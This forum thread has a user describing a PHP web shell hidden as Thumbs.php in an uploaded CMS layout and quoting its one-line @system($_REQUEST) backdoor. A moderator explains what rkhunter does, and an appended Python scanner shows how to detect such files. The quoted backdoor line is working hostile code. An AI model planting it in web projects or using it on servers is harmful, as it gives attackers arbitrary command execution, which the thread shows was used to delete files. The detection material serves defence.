Why did rkhunter not detect this backdoor?

Discussion in 'Developers' Forum' started by lanceq, Feb 25, 2012.

  1. lanceq

    lanceq New Member

    Yesterday someone sent me a layout for the CMS, and I uploaded it to my server. Included in the layout was a backdoor Thumbs.php file; this file contains:
    <pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>
    It seems to me that this backdoor exactly:


    This person executed this script via adress.com/layout/layoutname/img/Thumbs.php and removed all the files in that directory.

    I have ISPConfig; why did rkhunter not block this backdoor?
    I thought these programs with ISPConfig would protect me from the backdoor.
  2. falko

    falko Super Moderator ISPConfig Developer

    First, rkhunter doesn't remove anything - it just detects malware, trojans, etc., and warns you.

    Second, it doesn't check PHP scripts (how should this work? How should it know the hash of a bad PHP script that someone uploads to your server?).
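
A hash list cannot know an uploaded script in advance, but a content heuristic can flag the pattern in the posted Thumbs.php. The following Python scanner is an added example, not part of the original thread and not rkhunter or ISPConfig code; the function names, the list of execution functions and the asset directory names are assumptions chosen for illustration, and the sample tree is constructed from the file quoted in the first post.

```python
import re
import tempfile
from pathlib import Path

# Assumed heuristics for this example; not a complete ruleset.
EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
REQUEST_INPUT = r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\["
# Request data used directly as an argument of a command/code execution call.
DIRECT_EXEC = re.compile(r"@?\b" + EXEC_FUNCS + r"\s*\(\s*[^;]*?" + REQUEST_INPUT, re.I)
PHP_EXT = {".php", ".phtml", ".php5", ".phar"}
ASSET_DIRS = {"img", "images", "css", "fonts", "uploads"}  # should hold no PHP


def scan_tree(root):
    """Return {relative_path: [findings]} for suspicious PHP files under root."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_EXT:
            continue
        rel = path.relative_to(root)
        findings = []
        if DIRECT_EXEC.search(path.read_text(errors="replace")):
            findings.append("request input reaches exec function")
        if ASSET_DIRS & {part.lower() for part in rel.parent.parts}:
            findings.append("PHP file in asset directory")
        if findings:
            report[rel.as_posix()] = findings
    return report


def build_sample_tree(root):
    """Constructed sample: the layout path from the post plus a benign template."""
    layout = Path(root) / "layout" / "layoutname"
    (layout / "img").mkdir(parents=True)
    (layout / "img" / "Thumbs.php").write_text(
        '<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>'
    )
    (layout / "index.php").write_text("<?php echo htmlspecialchars($title); ?>")
    return Path(root)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for name, why in scan_tree(build_sample_tree(tmp)).items():
            print(name, "->", "; ".join(why))
```

Running it over an uploaded layout before publishing it under the web root reports Thumbs.php on both rules and leaves the benign template alone.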